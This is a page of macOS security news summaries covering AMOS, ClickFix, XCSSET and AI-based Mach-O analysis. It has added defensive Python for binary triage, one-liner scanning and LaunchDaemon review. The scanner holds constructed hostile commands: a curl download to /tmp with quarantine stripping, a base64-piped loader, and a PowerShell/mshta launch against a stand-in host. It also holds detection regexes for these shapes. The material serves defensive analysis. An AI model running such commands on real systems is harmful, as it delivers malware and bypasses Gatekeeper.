All news with #macos tag

Thu, November 6, 2025

AI-Powered Mach-O Analysis Reveals Undetected macOS Threats

🔎 VirusTotal ran VT Code Insight, an AI-based Mach-O analysis pipeline, against nearly 10,000 first-seen Apple binaries in a 24-hour stress test. Each binary is lifted with Binary Ninja to HLIL and pruned into a distilled representation small enough for a large LLM context window (Gemini), so the system produces a single-call, analyst-style summary from the raw file alone, with no metadata. Code Insight flagged 164 samples as malicious versus 67 by traditional AV, surfacing zero-detection macOS and iOS threats while also reducing false positives.
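The first, non-AI step of any pipeline like the one above is structural triage of the Mach-O itself: header, segments, linked dylibs and entry point. The following is an added example (not VirusTotal's, Binary Ninja's or Google's code) that parses a thin 64-bit Mach-O header and its load commands, with bounds checks on every cmdsize, and returns a few observations an analyst would want before spending an LLM call on the file. The sample binary is constructed in memory, so the script runs offline; the dylib names in it are made up.

```python
"""Mach-O 64 load-command triage. Added example; the sample file is built in
memory and is not a real binary. Constants come from <mach-o/loader.h>."""
import struct

MH_MAGIC_64 = 0xFEEDFACF      # little-endian 64-bit header
MH_EXECUTE = 0x2
LC_SEGMENT_64 = 0x19
LC_LOAD_DYLIB = 0x0C
LC_MAIN = 0x80000028          # LC_REQ_DYLD | 0x28
CPU_TYPE_ARM64 = 0x0100000C


def parse_macho64(data: bytes) -> dict:
    """Walk mach_header_64 and its load commands (thin, little-endian files only)."""
    if len(data) < 32:
        raise ValueError("too short for a mach_header_64")
    magic, cputype, _sub, filetype, ncmds, sizeofcmds, _flags, _res = struct.unpack_from("<8I", data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError(f"unexpected magic {magic:#x}: fat, 32-bit and big-endian files are not handled")
    info = {"cputype": cputype, "filetype": filetype, "segments": [], "dylibs": [], "entry": None}
    off, end = 32, 32 + sizeofcmds
    for _ in range(ncmds):
        # Bounds checks first: a malformed cmdsize is a classic parser trap.
        if off + 8 > end or off + 8 > len(data):
            raise ValueError("load commands overrun sizeofcmds or file")
        cmd, cmdsize = struct.unpack_from("<2I", data, off)
        if cmdsize < 8 or off + cmdsize > end or off + cmdsize > len(data):
            raise ValueError(f"malformed load command at offset {off:#x}")
        if cmd == LC_SEGMENT_64:
            info["segments"].append(data[off + 8:off + 24].rstrip(b"\0").decode("ascii", "replace"))
        elif cmd == LC_LOAD_DYLIB:
            name_off = struct.unpack_from("<I", data, off + 8)[0]   # lc_str offset, relative to the command
            if name_off >= cmdsize:
                raise ValueError("dylib name offset outside its command")
            info["dylibs"].append(data[off + name_off:off + cmdsize].split(b"\0", 1)[0].decode("utf-8", "replace"))
        elif cmd == LC_MAIN:
            info["entry"] = struct.unpack_from("<Q", data, off + 8)[0]  # entryoff, relative to __TEXT
        off += cmdsize
    return info


def triage(info: dict) -> list:
    """Cheap structural observations to record before deeper (HLIL/LLM) analysis."""
    notes = []
    if info["filetype"] == MH_EXECUTE and info["entry"] is None:
        notes.append("executable without LC_MAIN (legacy LC_UNIXTHREAD entry?)")
    if "__TEXT" not in info["segments"]:
        notes.append("no __TEXT segment")
    for d in info["dylibs"]:
        # Not malicious by itself (@rpath is normal in bundled apps), but worth resolving.
        if not d.startswith(("/usr/lib/", "/System/Library/")):
            notes.append(f"dylib outside system paths: {d}")
    return notes


def build_sample() -> bytes:
    """Constructed arm64 MH_EXECUTE with one segment, two dylib loads and an LC_MAIN."""
    def segment(name: bytes) -> bytes:       # segment_command_64, no sections
        return struct.pack("<2I16s4Q2I2I", LC_SEGMENT_64, 72, name, 0, 0, 0, 0, 0, 0, 0, 0)

    def dylib(path: str) -> bytes:           # dylib_command + NUL-terminated lc_str, 8-byte aligned
        s = path.encode() + b"\0"
        size = (24 + len(s) + 7) // 8 * 8
        return struct.pack("<6I", LC_LOAD_DYLIB, size, 24, 0, 0, 0) + s.ljust(size - 24, b"\0")

    def main_cmd(entryoff: int) -> bytes:    # entry_point_command
        return struct.pack("<2I2Q", LC_MAIN, 24, entryoff, 0)

    cmds = segment(b"__TEXT") + dylib("/usr/lib/libSystem.B.dylib") + dylib("@rpath/libhelper.dylib") + main_cmd(0x1000)
    header = struct.pack("<8I", MH_MAGIC_64, CPU_TYPE_ARM64, 0, MH_EXECUTE, 4, len(cmds), 0, 0)
    return header + cmds


if __name__ == "__main__":
    parsed = parse_macho64(build_sample())
    print(parsed)
    print(triage(parsed))
```

Universal (fat) binaries begin with the big-endian magic 0xCAFEBABE and carry one such header per architecture slice; split the slices first and run the parser on each. Anything this parser rejects (bad magic, a load command that overruns the file) is itself a signal worth recording, since real samples sometimes rely on parsers that are more forgiving than the loader.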

Thu, November 6, 2025

ClickFix attacks add multi-OS support, videos, timers

🔒 ClickFix campaigns have evolved to include embedded video tutorials, an automated OS detector, and a countdown timer that pressures victims into executing the pasted command before they think it over. Researchers at Push Security observed fake Cloudflare CAPTCHA pages that silently copy a malicious command to the clipboard and tailor the instructions to Windows, macOS, or Linux. Attackers promote these pages via malvertising, SEO poisoning, and compromised sites, then deliver platform-specific payloads such as mshta.exe launchers and PowerShell scripts on Windows. Users are strongly advised never to paste and run terminal commands from unknown web prompts.

Fri, October 31, 2025

ThreatLocker Adds macOS Configuration Scanning Beta

🔒 ThreatLocker has released DAC for macOS in Beta, extending its configuration-scanning capability to Apple endpoints. Using the existing ThreatLocker agent, the feature can scan Macs up to four times daily and surface risky settings—FileVault, firewall, sharing/remote access, admin accounts, Gatekeeper, update policies—directly in the same console used for Windows. Findings are grouped by endpoint and category and include step-by-step remediation plus mappings to frameworks such as CIS, NIST, ISO 27001, and HIPAA. The aim is to make misconfigurations visible and remediable before they become security incidents.

Tue, October 28, 2025

Researchers Expose GhostCall and GhostHire Campaigns

🔍 Kaspersky details two tied campaigns, GhostCall and GhostHire, that target Web3 and blockchain professionals worldwide and emphasize macOS-focused infection chains and social-engineering lures. The attacks deploy a range of payloads — DownTroy, CosmicDoor, RooTroy and others — to harvest secrets, escalate access, and persist. Guidance stresses user vigilance, strict dependency vetting, and centralized secrets management. Kaspersky links the activity to the BlueNoroff/Lazarus cluster and notes the actor has increasingly used generative AI to craft imagery and accelerate malware development.

Sat, October 18, 2025

Google Ads Promote Fake Homebrew, LogMeIn, TradingView Sites

🚨 Researchers uncovered a malvertising campaign that uses Google Ads to surface convincing fake Homebrew, LogMeIn, and TradingView download sites aimed at macOS developers. The pages prompt victims to paste what looks like the usual curl install one-liner into Terminal, but the command actually placed on the clipboard often decodes a base64 blob that fetches and runs an install.sh payload. That script strips the com.apple.quarantine extended attribute so Gatekeeper never inspects the download, then delivers infostealers that check for analysis environments before executing. Operators deploy AMOS and Odyssey, which harvest browser data, wallets, and credentials; users are urged not to paste unknown commands into Terminal.

Fri, October 10, 2025

AWS Client VPN Now Supports macOS Tahoe (26.0) Release

🔒 AWS Client VPN now supports macOS Tahoe (26.0) with client version 5.3.1. You can run the AWS-supplied VPN client on the latest macOS releases; desktop clients are provided free and can be downloaded from the AWS Client VPN download page. AWS Client VPN is a managed service that securely connects remote workers to AWS and on-premises networks and already supports macOS 13–15, Windows 10/11 (x64 and Arm64), and Ubuntu 22.04/24.04. This update helps organizations maintain secure remote access as endpoints upgrade to the latest macOS.

Fri, September 26, 2025

New macOS XCSSET Variant Targets Browsers and Clipboard

🛡️ Microsoft Threat Intelligence reported a new macOS malware variant of XCSSET that introduces browser-targeting changes, clipboard hijacking, and additional persistence mechanisms. The update uses run-only compiled AppleScripts with heavier obfuscation and encryption, and expands data theft to include Firefox. New modules implement clipper behavior (swapping cryptocurrency addresses on the clipboard) and LaunchDaemon- and Git-based persistence. Developers should inspect Xcode project files, particularly build phases that run scripts, and verify pasted wallet addresses rather than trusting the clipboard.

Thu, September 25, 2025

Microsoft: New XCSSET macOS Variant Targets Xcode Developers

🛡️ Microsoft Threat Intelligence has identified a new variant of the XCSSET macOS infostealer that has appeared in limited attacks and specifically targets Xcode projects. The variant expands capabilities to steal Firefox data using a modified HackBrowserData build, hijack the clipboard to replace cryptocurrency addresses, and employ new persistence techniques. It spreads by infecting shared Xcode project files so malicious code runs when a project is built. Microsoft says the campaign is not widespread and has notified Apple and GitHub while advising developers to inspect projects and keep macOS and apps up to date.

Mon, September 22, 2025

Fake macOS apps on GitHub spread Atomic (AMOS) malware

⚠️ LastPass warns of a macOS campaign that uses fraudulent GitHub repositories to impersonate popular apps and trick users into running Terminal commands. The fake installers deliver the Atomic (AMOS) infostealer through a ClickFix workflow: the pasted curl command decodes a base64-encoded URL, downloads an install.sh payload to /tmp, and runs it. Attackers rely on SEO and many disposable accounts to evade takedowns and boost search rankings. Users should install macOS software only from official vendor sites and avoid pasting unknown commands into Terminal.
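The curl-to-base64-to-install.sh chain in this item and in the Homebrew malvertising item above, the multi-OS ClickFix pages (mshta and PowerShell on the Windows branch), and the XCSSET run-script build phases all come down to one question: what does a pasted or project-embedded shell command actually do once its encoding layers are peeled back? The following is an added example (not code from LastPass, Push Security, Microsoft or any of the campaigns) that decodes embedded base64 up to two layers deep, matches a short indicator list drawn from the descriptions on this page, and applies the same triage to the shellScript entries of a project.pbxproj. The indicator list, the example.invalid hostnames and the pbxproj fragment are constructed for illustration; the one Homebrew one-liner is the genuine installer command.

```python
"""Triage for pasted shell one-liners and Xcode run-script phases. Added example;
the indicator list and samples are constructed for this page, not campaign IOCs."""
import base64
import re

# Shapes described in the items above: curl piped into a shell, a command hidden
# behind base64, quarantine stripping, staging in /tmp, osascript, and the Windows
# branch of a multi-OS ClickFix page (mshta / PowerShell).
INDICATORS = [
    (re.compile(r"\bcurl\b[^|\n]*\|\s*(?:ba|z)?sh\b"), "remote content piped straight into a shell"),
    (re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*curl\b"), "remote script run via sh -c \"$(curl ...)\""),
    (re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"), "command hidden behind inline base64 decoding"),
    (re.compile(r"\bxattr\s+(?:-(?:c|rc|cr)\b|-d\s+com\.apple\.quarantine)"), "quarantine attribute stripped (Gatekeeper bypass)"),
    (re.compile(r"/(?:private/)?tmp/[\w./-]*install\.sh"), "installer staged in /tmp"),
    (re.compile(r"\bosascript\b"), "AppleScript run via osascript"),
    (re.compile(r"\bmshta(?:\.exe)?\b", re.I), "mshta LOLBin launch (Windows branch)"),
    (re.compile(r"\bpowershell(?:\.exe)?\b", re.I), "PowerShell launch (Windows branch)"),
]
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
SHELL_SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')


def decode_blobs(text: str) -> list:
    """Embedded base64 runs that decode to printable text (binary payloads are skipped)."""
    out = []
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):     # binascii.Error is a ValueError
            continue
        if decoded and all(c.isprintable() or c in "\n\t" for c in decoded):
            out.append(decoded)
    return out


def triage_shell(text: str, depth: int = 0) -> list:
    """Match indicators on the text, then recurse (two layers) into whatever base64 hides."""
    where = "" if depth == 0 else f" [base64 layer {depth}]"
    findings = [why + where for rx, why in INDICATORS if rx.search(text)]
    if depth < 2:
        for inner in decode_blobs(text):
            findings.extend(triage_shell(inner, depth + 1))
    return findings


def pbxproj_scripts(pbxproj_text: str) -> list:
    """Every shellScript body in a project.pbxproj, with the OpenStep string escapes undone."""
    unescape = {"n": "\n", "t": "\t"}
    return [re.sub(r"\\(.)", lambda m: unescape.get(m.group(1), m.group(1)), m.group(1))
            for m in SHELL_SCRIPT_RE.finditer(pbxproj_text)]


def scan_pbxproj(pbxproj_text: str) -> list:
    """Findings per run-script build phase, in file order."""
    return [triage_shell(s) for s in pbxproj_scripts(pbxproj_text)]


# Constructed samples (example.invalid is a reserved, non-routable name).
HIDDEN = "curl -fsSL http://example.invalid/x.sh -o /tmp/install.sh; xattr -c /tmp/install.sh; sh /tmp/install.sh"
BLOB = base64.b64encode(HIDDEN.encode()).decode()
FAKE_BREW = f"echo {BLOB} | base64 -d | sh"
REAL_BREW = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
WINDOWS_CLICKFIX = 'powershell -w hidden -c "mshta http://example.invalid/a.hta"'
BENIGN = "brew install wget"
PBXPROJ = (
    "\t\tAB0000000000000000000001 /* Run Script */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    '\t\t\tshellScript = "# Type a script or drop a script file from your workspace to insert its path.\\n";\n'
    "\t\t};\n"
    "\t\tAB0000000000000000000002 /* Run Script */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    f'\t\t\tshellScript = "echo {BLOB} | base64 -D | sh\\n";\n'
    "\t\t};\n"
)

if __name__ == "__main__":
    for sample in (FAKE_BREW, REAL_BREW, WINDOWS_CLICKFIX, BENIGN):
        print(sample[:60], "->", triage_shell(sample))
    print(scan_pbxproj(PBXPROJ))
```

The genuine Homebrew installer trips the sh -c "$(curl ...)" rule as well, which is exactly why the malvertised pages copy its shape: the deciding check is whether the host really is Homebrew's, not whether the command looks like brew. Real ClickFix blobs may nest deeper or decode to binary; the two-layer cap and the printable-text filter are the knobs to loosen during an investigation.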

Sat, September 20, 2025

LastPass Alerts: Fake GitHub Repos Deliver macOS Infostealer

🛡️ LastPass warns of a widespread campaign leveraging fake GitHub repositories and SEO-poisoned search results to distribute the Atomic (AMOS) infostealer to macOS users. The malicious repositories impersonate popular tools such as LastPass, 1Password, and Dropbox and redirect victims to pages that instruct them to run Terminal commands. Those commands fetch and execute a multi-stage dropper that deploys Atomic Stealer. Users should verify that they are on the official vendor page and avoid running untrusted commands in Terminal.

Fri, September 5, 2025

macOS AMOS Stealer Uses Cracked Apps to Bypass Gatekeeper

🛡️ Trend Micro warns of an Atomic macOS Stealer (AMOS) campaign that lures users with trojanized 'cracked' apps such as CleanMyMac and instructs victims to run terminal commands. Attackers shifted from .dmg installers to terminal-based installs to evade Gatekeeper enhancements: a command the user types into Terminal is never subject to the checks Gatekeeper applies to downloaded apps. AMOS persists via a LaunchDaemon and a hidden binary, then exfiltrates credentials, browser data, crypto wallets, Telegram chats and keychain items. Researchers advise layered defenses beyond native OS protections.
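Both this AMOS item and the XCSSET items above name a LaunchDaemon as the persistence mechanism, so reviewing launchd jobs is the natural hunting step. The following is an added example (not Trend Micro's or Microsoft's tooling) that parses every plist in a LaunchDaemons/LaunchAgents directory with the standard plistlib module and flags the traits the page describes: a hidden (dot-prefixed) binary, a program run from a user-writable location, a shell wrapper with an inline -c command, RunAtLoad combined with KeepAlive, and a Label that does not match the file name. The two jobs it scans are constructed in a temporary directory; their labels and paths are invented for illustration.

```python
"""LaunchDaemon/LaunchAgent plist review. Added example; the two plists are
constructed here, not taken from a real infection."""
import os
import plistlib
import tempfile

# Root-run daemons normally live under system or vendor paths; a job that executes
# something from a temp dir, a home directory or a dot-prefixed folder deserves a look.
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                 "/Users/", "/var/folders/", "/private/var/folders/")
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")


def launch_item_findings(plist: dict, filename: str = "") -> list:
    """Heuristic findings for one parsed launchd job; an empty list means nothing stood out."""
    findings = []
    args = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program") or (args[0] if args else None)
    if not program:
        return ["no Program or ProgramArguments"]
    # Look at every absolute path in argv, not just argv[0]: "/bin/sh -c /path/.x"
    # is the usual way to push the real binary further down the argument list.
    for p in [program] + [a for a in args[1:] if a.startswith("/")]:
        if any(part.startswith(".") and part not in (".", "..") for part in p.split("/")):
            findings.append(f"hidden path component: {p}")
        if p.startswith(USER_WRITABLE):
            findings.append(f"runs from user-writable location: {p}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive (launchd restarts it if killed)")
    if program in SHELLS and "-c" in args:
        findings.append("shell wrapper executing an inline -c command")
    label = plist.get("Label")
    if filename and label and os.path.basename(filename) != f"{label}.plist":
        findings.append(f"Label {label!r} does not match file name {os.path.basename(filename)!r}")
    return findings


def scan_launch_dir(directory: str) -> dict:
    """Parse every .plist in a LaunchDaemons/LaunchAgents directory; keep only jobs with findings."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        full = os.path.join(directory, name)
        try:
            with open(full, "rb") as fh:
                plist = plistlib.load(fh)           # XML and binary plists alike
        except Exception as exc:                    # an unparseable job is itself a finding
            results[name] = [f"unparseable plist: {exc}"]
            continue
        found = launch_item_findings(plist, full)
        if found:
            results[name] = found
    return results


# Constructed jobs: a plausible vendor daemon and a hidden-binary persistence job.
BENIGN = {"Label": "com.example.backupagent",
          "ProgramArguments": ["/usr/local/bin/backupagent", "--daemon"],
          "RunAtLoad": True}
SUSPECT = {"Label": "com.example.updater",
           "ProgramArguments": ["/bin/sh", "-c", "/Users/jdoe/.helper/.agent"],
           "RunAtLoad": True, "KeepAlive": True}


def demo() -> dict:
    """Write both jobs to a temporary directory and scan it as you would /Library/LaunchDaemons."""
    with tempfile.TemporaryDirectory() as d:
        for name, job in (("com.example.backupagent.plist", BENIGN), ("com.example.helper.plist", SUSPECT)):
            with open(os.path.join(d, name), "wb") as fh:
                plistlib.dump(job, fh)
        return scan_launch_dir(d)


if __name__ == "__main__":
    for name, found in demo().items():
        print(name)
        for f in found:
            print("  -", f)
```

Point scan_launch_dir at /Library/LaunchDaemons, /Library/LaunchAgents and ~/Library/LaunchAgents, and compare with `launchctl list` to see which jobs are actually loaded. The findings are leads for an analyst rather than verdicts: a vendor daemon running out of a user's home directory is unusual but not unheard of, whereas a root job whose real program sits behind /bin/sh -c in a dot-folder under /Users is exactly the shape described above.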
